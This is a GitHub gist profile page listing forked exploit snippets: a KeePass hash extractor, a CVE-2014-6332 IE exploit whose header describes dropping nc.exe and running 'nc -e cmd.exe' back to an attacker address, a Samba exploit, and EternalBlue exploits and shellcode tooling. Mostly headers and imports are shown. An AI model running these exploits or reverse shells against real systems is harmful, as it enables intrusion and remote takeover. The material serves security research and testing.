Skip to content

Instantly share code, notes, and snippets.

View p4ch0u's full-sized avatar
🎯
Focusing

Papa S. p4ch0u

🎯
Focusing
11 followers · 37 following
View GitHub Profile
@p4ch0u
p4ch0u / keepass2john.py
Created September 21, 2018 08:30 — forked from HarmJ0y/keepass2john.py
Python port of John the Ripper's keepass2john - extracts a HashCat/john crackable hash from KeePass 1.x/2.X databases
#!/usr/bin/python
# Python port of keepass2john from the John the Ripper suite (http://www.openwall.com/john/)
# ./keepass2john.c was written by Dhiru Kholia <dhiru.kholia at gmail.com> in March of 2012
# ./keepass2john.c was released under the GNU General Public License
# source keepass2john.c source code from: http://fossies.org/linux/john/src/keepass2john.c
#
# Python port by @harmj0y, GNU General Public License
#
@p4ch0u
p4ch0u / cve-2014-6332_exploit.html
Created February 1, 2018 21:46 — forked from worawit/cve-2014-6332_exploit.html
CVE-2014-6332 IE exploit to get shell (packed everything in one html)
<html>
<head>
<!--
CVE-2014-6332 exploit to bypass IE protected mode if enabled (with localhost) then get shell
The exploit drops nc.exe then execute "nc -e cmd.exe -n ip port"
'server_ip' and 'server_port' in javascript below determined the connect back target
Tested on
- IE11 + Windows 7 64-bit (EPM is off)
- IE11 + Windoes 8.1 64-bit (EPM is off)
@p4ch0u
p4ch0u / cve-2015-0240_samba_exploit.py
Created February 1, 2018 21:46 — forked from worawit/cve-2015-0240_samba_exploit.py
Exploit for Samba vulnerabilty (CVE-2015-0240)
#!/usr/bin/python
"""
Exploit for Samba vulnerabilty (CVE-2015-0240) by sleepya
The exploit only targets vulnerable x86 smbd <3.6.24 which 'creds' is controlled by
ReferentID field of PrimaryName (ServerName). That means '_talloc_zero()'
in libtalloc does not write a value on 'creds' address.
Reference:
- https://securityblog.redhat.com/2015/02/23/samba-vulnerability-cve-2015-0240/
@p4ch0u
p4ch0u / eternalblue7_exploit.py
Created February 1, 2018 21:46 — forked from worawit/eternalblue7_exploit.py
Eternalblue exploit for Windows 7/2008
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 7/2008 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@p4ch0u
p4ch0u / eternalblue8_exploit.py
Created February 1, 2018 21:45 — forked from worawit/eternalblue8_exploit.py
Eternalblue exploit for Windows 8/2012
#!/usr/bin/python
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
from impacket import smb, ntlm
from struct import pack
import sys
import socket
'''
EternalBlue exploit for Windows 8 and 2012 by sleepya
The exploit might FAIL and CRASH a target system (depended on what is overwritten)
@p4ch0u
p4ch0u / eternalblue_merge_shellcode.py
Created February 1, 2018 21:07 — forked from worawit/eternalblue_merge_shellcode.py
Windows x64 and x86 kernel shellcode for eternalblue exploit
# This file has no update anymore. Please see https://github.com/worawit/MS17-010
import sys
from struct import pack
if len(sys.argv) < 4:
print('Usage: {} sc_x86 sc_x64 sc_out'.format(sys.argv[0]))
sys.exit()
sc_x86 = open(sys.argv[1], 'rb').read()
sc_x64 = open(sys.argv[2], 'rb').read()
@p4ch0u
p4ch0u / Buffer Overflow Tutorial in Kali.md
Created November 19, 2017 16:41 — forked from apolloclark/Buffer Overflow Tutorial in Kali.md
Buffer overflow demonstration in Kali Linux, based on the Computerphile video